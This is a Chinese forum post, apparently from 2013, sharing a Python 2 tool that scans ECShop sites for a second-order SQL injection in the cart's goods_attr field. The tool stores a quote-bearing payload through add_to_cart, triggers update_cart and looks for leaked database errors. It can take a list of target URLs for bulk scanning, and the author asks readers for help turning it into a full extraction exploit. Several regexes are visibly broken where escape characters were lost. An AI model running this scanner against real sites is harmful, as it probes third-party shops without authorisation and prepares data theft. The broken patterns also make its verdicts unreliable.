鉴于好久没发帖子了,看到ecshop的goods_attr和goods_attr_id两个二次注入漏洞,于是写了这个小工具,由于不会构造语句,只能写出判断漏洞是否存在的工具了,大家海涵,有能构造出语句的,联系我,我再完善一下。
完整代码如下:
#! /usr/bin/env python2.7
#coding=utf-8
#by 少校 QQ1006079161 写入2013年8月14号深夜
#ecshop的goods_attr和goods_attr_id两个二次注入漏洞
#参考[url]https://forum.90sec.org/viewthread.php?tid=6476&highlight=ecshop[/url]
import re
import sys
import getopt
import urllib
import urllib2
import cookielib
def make_order(arg):
    """Try product ids 1..24 against add_to_cart, then run the goods_attr check on success.

    arg is the site base URL (scheme + host, no trailing slash); it is only used
    to build '<arg>/flow.php?step=add_to_cart'. Each attempt POSTs a
    'goods=...' body whose "spec" array contains a quote character; once an
    add-to-cart response matches the 's1s' pattern the value is assumed to be
    stored in the session cart and goods_attr_sqlinjection(arg) performs the
    second-order check. Any exception from the request is printed and ends the
    loop. Nothing is returned; results are only printed.
    """
    # NOTE(review): the leading 'n' is most likely a '\n' whose backslash was lost in the paste.
    print u'n当前正在检测%s' % arg
    global mdbhack  # product id currently under test; nothing else on this page reads it
    run = True
    mdbhack = 1
    # Log signal for defenders: every attempt is a POST to flow.php?step=add_to_cart
    url = '%s/flow.php?step=add_to_cart' % arg
    while run and mdbhack<25:# only ids 1..24 are tried for speed; raise the bound if needed
        # quick-buy cart body; the "spec" entry with the quote is what update_cart later re-reads
        data = '''goods={"quick":1,"spec":["163","163'"],"goods_id":%s,"number":"1","parent":0}''' % mdbhack
        # A fresh cookie jar per attempt. install_opener makes the module-level
        # urllib2.urlopen() reuse this opener, which is how goods_attr_sqlinjection()
        # ends up talking to the same cart session.
        cookiejar = cookielib.CookieJar()
        urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
        urllib2.install_opener(urlOpener) # after install_opener, urlopen() uses this opener
        try:
            httpres = urlOpener.open(url,data,timeout=5)
            html = httpres.read()
            # NOTE(review): 's1s' looks like '\s1\s' with the escapes lost; as written it
            # matches the literal text "s1s" anywhere in the response body.
            order_ok = re.search('s1s',html)
            if order_ok:
                print u'[LOG] 自动完成订购订单!'
                goods_attr_sqlinjection(arg)
                run = False
                break
            else:
                print u'[LOG] 自动订购产品id%s失败!' % mdbhack
                mdbhack += 1
                # reached only after the 24th failed id (mdbhack was just incremented to 25)
                if mdbhack == 25 and run:
                    print u'[LOG] 抱歉,前25个id的产品全部订购失败,请手动检测吧!'
        except Exception,e:
            # any failure of the request or of the nested check (e.g. a timeout or an
            # IndexError raised inside goods_attr_sqlinjection) stops the scan for this target
            print e
            run = False
            break
def goods_attr_sqlinjection(arg):
    """Second-order check: resubmit the cart via update_cart and look for leaked SQL error text.

    Depends on the cookie-carrying opener that make_order() installed globally;
    the plain urllib2.urlopen() calls below therefore reuse the same cart
    session. The first GET reads the cart page to find the goods_number[...]
    index, the POST then updates that cart line (where the stored "spec" value
    is re-read server-side). Only prints a verdict; nothing is returned.
    """
    url = arg+'/flow.php'
    html = urllib2.urlopen(url).read()
    # NOTE(review): as written, '[(.*?)]' is a character class rather than an escaped
    # bracket pair with a capture group (the backslashes were probably lost in the
    # paste), so findall() returns whole matches; [0] raises IndexError when there is
    # no match at all (caught by the caller's except in make_order).
    good_numbers = re.findall('''name="goods_number[(.*?)]"''',html)[0]# build the goods_number index
    if good_numbers:  # only false for an empty match string
        # %5B/%5D are '[' and ']'; the submit value appears to be the GBK-encoded button label
        data = 'goods_number%5B'+str(good_numbers)+'''%5D=1&submit=%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5&step=update_cart'''
        request = urllib2.Request(url,data)
        httpres = urllib2.urlopen(request,timeout=10)
        html = httpres.read()
        # Error-based signal only: the verdict is "vulnerable" solely when one of these
        # fragments is echoed back, so a site that returns a generic error page without
        # database error text is reported as "not vulnerable" by this check.
        if re.search('server error|report:Array|You have an error|your SQL syntax|the right syntax to use near',html):
            print u'[LOG] 恭喜您存在goods_attr注入漏洞!'
        else:
            print u'[LOG] 不存在此漏洞'
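def main(url,file_txt):
    """Dispatch the scan to a single URL or to every line of a URL list file.

    Exactly one of url / file_txt is expected: if both are given the usage
    banner is printed and the process exits with status 1. Each target is
    passed through str.strip() before make_order(). A failure to open or
    read file_txt is printed and also exits with status 1.
    """
    if url and file_txt:
        printerror()
        sys.exit(1)
    if url:
        make_order(url.strip())
    if file_txt:
        try:
            # 'with' closes the list file even if a target raises part-way through
            with open(file_txt,'r') as targets:
                for line in targets:
                    make_order(line.strip())
        except Exception as e:
            print(e)
            sys.exit(1)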
def printerror():
    """Print the usage banner: ASCII art followed by the two invocation examples."""
    # The leading and trailing empty entries reproduce the blank lines around the banner.
    banner_lines = (
        "",
        ",--^----------,--------,-----,-------^--,",
        "| ||||||||| `--------' | O ..",
        "`+---------------------------^----------|",
        "`_,-------, [email]__1006079161@QQ.com______[/email]|",
        "/ XXXXXX /`| /",
        "/ XXXXXX / ` /",
        "/ XXXXXX /______(",
        "/ XXXXXX /",
        "/ XXXXXX /",
        "(________( For example:",
        "`------' scan.py -u [url]http://www.mdbhack.com[/url]",
        "scan.py -f ecshop.txt",
        "",
    )
    print("\n".join(banner_lines))
if __name__ == '__main__':
    # Exactly one option/value pair is accepted: `-u URL` or `-f FILE`.
    url = None
    file_txt = None
    if len(sys.argv) != 3:
        printerror()
        sys.exit(1)
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:f:")
    except BaseException:
        # getopt rejects unknown options and missing values; show usage instead
        printerror()
        sys.exit(1)
    # last occurrence of an option wins, matching a sequential assignment loop
    parsed = dict(opts)
    url = parsed.get('-u')
    file_txt = parsed.get('-f')
    main(url, file_txt)
作者:少校 90sec


